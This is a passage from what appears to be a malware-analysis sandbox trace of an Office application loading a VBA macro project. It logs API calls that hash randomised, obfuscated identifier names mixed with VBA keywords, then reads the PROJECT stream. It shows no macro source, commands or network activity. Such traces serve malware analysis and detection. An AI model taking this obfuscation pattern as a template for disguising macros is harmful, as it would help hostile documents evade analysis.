lcid=0x409, szName="JDBAwcBU") returned 0x108b7c [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jQcwQ1A4") returned 0x10830a [0067.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.949] VarI4FromStr (in: strIn="175019731", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] VarI4FromStr (in: strIn="287924315", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] VarI4FromStr (in: strIn="364488548", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] VarI4FromStr (in: strIn="323669516", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] VarI4FromStr (in: strIn="24970886", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zCAkZDwc") returned 0x10fa5d [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kDAAQZ") returned 0x10f19f [0067.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.949] VarI4FromStr (in: strIn="94481846", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] VarI4FromStr (in: strIn="459418461", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAkAAA") returned 0x106386 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.949] VarI4FromStr (in: strIn="675772307", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TwxD141_") returned 0x10a395 [0067.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ECAQUQAo") returned 0x10dd1c [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nABQQDc") returned 0x10fb95 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bCGC_D4") returned 0x10902c [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bxUk4Q") returned 0x102e1c [0067.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kCBAoAU1") returned 0x10e46c [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dACZQAA") returned 0x1011d8 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAGCGGBw") returned 0x10dd61 [0067.950] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="zQX1CAA", cchCount1=-1, lpString2="OAGCGGBw", cchCount2=-1) returned 3 [0067.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAQ4AAA") returned 0x100591 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAABQ4") returned 0x1074c3 [0067.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBxcAwA") returned 0x103052 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fwAoA4_x") returned 0x1055dc [0067.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sw1GAC4U") returned 0x109e92 [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.950] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VDZxA4") returned 0x10b164 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ocQUDQB") returned 0x10c0af [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAoADA") returned 0x10f2a7 [0067.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iA_kACU") returned 0x105436 [0067.951] CExposedStream::Read () returned 0x0 [0067.951] CExposedStream::Read () returned 0x0 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rocGAGZC") returned 0x109a93 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NABAxU") returned 0x104675 [0067.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MBxAoGU") returned 0x10ff58 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tUUZAxUw") returned 0x10d1d9 [0067.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bCx1AUcx") returned 0x104bf2 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Uw41X_BQ") returned 0x10b405 [0067.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAQQcwA") returned 0x108966 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.951] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EGUABU1Z") returned 0x10eaa9 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tBGAoDQ1") returned 0x101408 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jkUDBQAU") returned 0x108003 [0067.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tQ4AAA1") returned 0x1029ef [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PA1GAD4") returned 0x10bc47 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BDBA_XC") returned 0x1044d6 [0067.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nwxDDA_") returned 0x101255 [0067.952] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="XAwxAX", cchCount1=-1, lpString2="nwxDDA_", cchCount2=-1) returned 3 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RUDUBU") returned 0x10fa9e [0067.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wkDA_1") returned 0x103b48 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WBQ_AAZX") returned 0x103394 [0067.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="axD_kQ1B") returned 0x1081b4 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BUAkQUBU") returned 0x10da97 [0067.952] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAAAA1") returned 0x102288 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQDAGAAk") returned 0x104d3a [0067.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AQADAA") returned 0x108515 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iCkBAw__") returned 0x10e39d [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cDxUAD1Q") returned 0x10bb89 [0067.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UQ4_UA") returned 0x10d453 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAA_GAXw") returned 0x1044d3 [0067.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAA4AA") returned 0x1027a2 [0067.953] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="mBcAUkQ", cchCount1=-1, lpString2="BAA4AA", cchCount2=-1) returned 3 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQUBcQ") returned 0x10a1c1 [0067.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y_AA4DU") returned 0x10c3b2 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bABwDZc") returned 0x10a80b [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VoGDAZZ_") returned 0x109859 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.953] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HA1GU1C") returned 0x1035c7 [0067.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="r_XQAcA") returned 0x10c821 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GD4DZo") returned 0x109e51 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rXGDGB4Q") returned 0x10e81d [0067.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAoCGkAQ") returned 0x10b595 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAkBcQA") returned 0x103e92 [0067.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i_A44xA") returned 0x10cf37 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vACGAQAA") returned 0x1061e5 [0067.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZcD_BkZA") returned 0x104246 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zGcACAkk") returned 0x109f7e [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wCAw1AxB") returned 0x1093cd [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KAcDQDC") returned 0x10cc2e [0067.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SDA_CA4B") returned 0x10cc03 [0067.954] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAABQA_") returned 0x108aab [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tBXAABU") returned 0x105ab5 [0067.955] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="YwD4UZkA", cchCount1=-1, lpString2="tBXAABU", cchCount2=-1) returned 3 [0067.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MZAADA") returned 0x10a6fc [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W1AABx") returned 0x101484 [0067.955] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="EAcAUwx", cchCount1=-1, lpString2="W1AABx", cchCount2=-1) returned 1 [0067.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sBDkXAD") returned 0x10f008 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CZxDoQkB") returned 0x107f2a [0067.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="twAcUBx") returned 0x10fae9 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.955] CExposedStream::Read () returned 0x0 [0067.955] IMalloc:Realloc (This=0x7fefec05380, pv=0xafbfec0, cb=0xf0c) returned 0xafbfec0 [0067.955] CExposedStream::Release () returned 0x1 [0067.955] CExposedStream::Release () returned 0x0 [0067.955] CExposedStream::Release () returned 0x0 [0067.955] IMalloc:Free (This=0x7fefec05380, pv=0xaf1b5b0) [0067.955] IMalloc:Free (This=0x7fefec05380, pv=0x4142f60) [0067.955] IMalloc:Free (This=0x7fefec05380, pv=0xafadb20) [0067.955] IMalloc:Free (This=0x7fefec05380, pv=0x4145170) [0067.955] CExposedStream::Seek () returned 0x80030102 [0067.956] CExposedStream::Release () returned 0x0 [0067.956] IMalloc:Free (This=0x7fefec05380, pv=0x69f9090) [0067.956] malloc (_Size=0x168) returned 0x2518300 [0067.956] malloc (_Size=0x20) returned 0x2fcdf60 [0067.956] lstrcpyA (in: lpString1=0x251834c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0067.956] CExposedDocFile::Stat () returned 0x0 [0067.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x251834c, cbMultiByte=-1, lpWideCharStr=0x1477a0, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0067.957] CExposedDocFile::OpenStream () returned 0x0 [0067.957] CExposedDocFile::AddRef () returned 0x3 [0067.957] malloc (_Size=0x138) returned 0x2518470 [0067.957] CExposedStream::Stat () returned 0x0 [0067.957] malloc (_Size=0x1d2) returned 0x25185b0 [0067.957] CExposedStream::Read () returned 0x0 [0067.957] malloc (_Size=0x28) returned 0x25187c0 [0067.957] malloc (_Size=0x20) returned 0x25187f0 [0067.957] lstrlenA (lpString="") returned 0 [0067.957] lstrcpyA (in: lpString1=0x2fcdf90, lpString2="" | out: lpString1="") returned="" [0067.957] malloc (_Size=0x28) returned 0x2518820 [0067.957] malloc (_Size=0x20) returned 0x2518850 [0067.957] lstrlenA (lpString="") returned 0 [0067.957] lstrcpyA (in: lpString1=0x2519390, lpString2="" | out: lpString1="") returned="" [0067.957] malloc (_Size=0x28) returned 0x2518880 [0067.957] malloc (_Size=0x20) returned 0x25188b0 [0067.957] lstrlenA (lpString="") returned 0 [0067.957] lstrcpyA (in: lpString1=0x25193d0, lpString2="" | out: lpString1="") returned="" [0067.957] malloc (_Size=0x120) returned 0x2519410 [0067.958] lstrcpynA (in: lpString1=0x2519430, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0067.958] malloc (_Size=0x120) returned 0x2519540 [0067.958] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0067.958] malloc (_Size=0x36) returned 0x2519670 [0067.958] lstrcpyA (in: lpString1=0x2519670, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0067.958] malloc (_Size=0x120) returned 0x25196b0 [0067.958] lstrcpynA (in: lpString1=0x25196d0, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0067.958] malloc (_Size=0x120) returned 0x25197e0 [0067.958] lstrlenA (lpString="0, 0, 0, 0, C") returned 13 [0067.958] malloc (_Size=0xe) returned 0x2519910 [0067.958] lstrcpyA (in: lpString1=0x2519910, lpString2="0, 0, 0, 0, C" | out: lpString1="0, 0, 0, 0, C") returned="0, 0, 0, 0, C" [0067.958] malloc (_Size=0x120) returned 0x2519930 [0067.959] lstrlenA (lpString="25, 25, 1385, 693, ") returned 19 [0067.959] malloc (_Size=0x14) returned 0x2519a90 [0067.959] lstrcpyA (in: lpString1=0x2519a90, lpString2="25, 25, 1385, 693, " | out: lpString1="25, 25, 1385, 693, ") returned="25, 25, 1385, 693, " [0067.959] malloc (_Size=0x120) returned 0x251a260 [0067.959] lstrlenA (lpString="50, 50, 1410, 718, ") returned 19 [0067.959] malloc (_Size=0x14) returned 0x2519ab0 [0067.959] lstrcpyA (in: lpString1=0x2519ab0, lpString2="50, 50, 1410, 718, " | out: lpString1="50, 50, 1410, 718, ") returned="50, 50, 1410, 718, " [0067.959] CExposedDocFile::OpenStream () returned 0x0 [0067.959] CExposedStream::Stat () returned 0x0 [0067.959] malloc (_Size=0x47) returned 0x251a390 [0067.959] CExposedStream::Read () returned 0x0 [0067.960] CExposedStream::Release () returned 0x0 [0067.960] lstrcpyA (in: lpString1=0x2fcdfb0, lpString2="" | out: lpString1="") returned="" [0067.960] malloc (_Size=0x188) returned 0x251a3e0 [0067.960] lstrcmpiA (lpString1="cU1A41_", lpString2="cU1A41_") returned 0 [0067.960] lstrlenA (lpString="cU1A41_") returned 7 [0067.960] malloc (_Size=0xa8) returned 0x251a590 [0067.960] lstrcpyA (in: lpString1=0x25193b0, lpString2="" | out: lpString1="") returned="" [0067.960] malloc (_Size=0x180) returned 0x251a640 [0067.960] lstrcmpiA (lpString1="iAAB4Dx", lpString2="iAAB4Dx") returned 0 [0067.960] lstrlenA (lpString="iAAB4Dx") returned 7 [0067.960] malloc (_Size=0xa8) returned 0x251a7f0 [0067.960] lstrcpyA (in: lpString1=0x25193f0, lpString2="" | out: lpString1="") returned="" [0067.960] malloc (_Size=0x180) returned 0x251a8a0 [0067.960] lstrcmpiA (lpString1="GB_C_A", lpString2="GB_C_A") returned 0 [0067.960] lstrlenA (lpString="GB_C_A") returned 6 [0067.960] malloc (_Size=0xa8) returned 0x251aa50 [0067.960] free (_Block=0x251a390) [0067.961] lstrlenA (lpString="mD_Q_QxA") returned 8 [0067.961] lstrcpyA (in: lpString1=0x2519ad0, lpString2="mD_Q_QxA" | out: lpString1="mD_Q_QxA") returned="mD_Q_QxA" [0067.961] atoi (_Str="393222000") returned 393222000 [0067.961] lstrcpynA (in: lpString1=0x2fcd43c, lpString2="{1D519C21-DE74-4139-A7B6-FA29997D1368}", iMaxLength=39 | out: lpString1="{1D519C21-DE74-4139-A7B6-FA29997D1368}") returned="{1D519C21-DE74-4139-A7B6-FA29997D1368}" [0067.961] StringFromGUID2 (in: rguid=0x7fee3b178a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lpsz=0x694fee8, cchMax=39 | out: lpsz="{00000000-0000-0000-0000-000000000000}") returned 39 [0067.961] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{1D519C21-DE74-4139-A7B6-FA29997D1368}") returned -1 [0067.961] lstrlenA (lpString="{1D519C21-DE74-4139-A7B6-FA29997D1368}") returned 38 [0067.961] malloc (_Size=0x4) returned 0x251a390 [0067.961] free (_Block=0x251a390) [0067.961] lstrlenA (lpString="{1D519C21-DE74-4139-A7B6-FA29997D1368}") returned 38 [0067.961] malloc (_Size=0x1) returned 0x251ab30 [0067.961] free (_Block=0x251ab30) [0067.961] lstrlenA (lpString="{1D519C21-DE74-4139-A7B6-FA29997D1368}") returned 38 [0067.961] malloc (_Size=0x1) returned 0x251ab30 [0067.961] free (_Block=0x251ab30) [0067.961] free (_Block=0x25185b0) [0067.961] free 